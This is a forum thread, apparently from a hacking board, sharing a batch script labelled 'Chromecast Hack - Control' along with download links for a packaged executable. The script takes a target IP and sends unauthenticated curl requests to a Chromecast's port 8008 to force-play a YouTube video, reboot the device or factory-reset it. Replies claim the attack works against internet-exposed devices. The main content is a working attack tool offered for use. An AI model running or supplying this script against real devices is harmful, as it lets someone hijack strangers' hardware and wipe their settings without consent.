Login Register






The issue regarding searched threads returning 404s has been fixed. My apologies. - NekoElf
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


Chromecast Hack - Control + curl [Research] filter_list
Author
Message
Chromecast Hack - Control + curl [Research] #1
Code:
@title Chromecast Hack - Control
@echo off
:start
echo ...................................................
echo .       Chromecast Hack - Control                 .
echo ...................................................
set /p ip=" IP Address : "
set /p id=" Youtube Video ID : "
cls
echo ...................................................
echo .       Chromecast Hack - Control                 .
echo ...................................................
echo 1 - Play a Video
echo 2 - Reboot
echo 3 - Factory Reset
set /p choice=Choose a option :  
if '%choice%'=='1' goto 1
if '%choice%'=='2' goto 2
if '%choice%'=='3' goto 3
cls
goto start
:1
curl.exe -H "content-Type: application/json" http://%ip%:8008/apps/YouTube -X POST -d 'v=%id%'
echo Video %id% send to %ip%
pause
cls
goto start
:2
curl.exe -H "content-Type: application/json" http://%ip%:8008/setup/reboot -X POST -d '{ "params": "now" }'
pause
cls
goto start
:3
curl.exe -H "content-Type: application/json" http://%ip%:8008/setup/reboot -X POST -d '{ "params": "fdr" }'
pause
cls
goto start

Download: Chromecast Hack Control + curl.exe
https://www.uploadadz.com/btzaz7x29gdu

Download 2: Chromecast Hack Control + curl.exe
https://dropbbase.com/download/9592ecdb0...ca15b.html

Virus Scan:
https://www.virustotal.com/#/file/8c9748.../detection
(This post was last modified: 01-08-2019, 03:06 AM by hacxx.)

Reply

RE: Chromecast Hack - Control + curl [Research] #2
Can you still send curl requests with actual payloads to chromecasts? I thought video payloads (specifically for YT) got patched, but you could still send the kill flag to end the service?

Reply

RE: Chromecast Hack - Control + curl [Research] #3
You can on older devices. Also you can programmaticly reboot/start a video on ChromeCasts connected to the internet. You just need to get access to a live feed and create the payload.

(The above link is broken)
(This post was last modified: 08-04-2019, 06:40 PM by hacxx.)

Reply







Users browsing this thread: 1 Guest(s)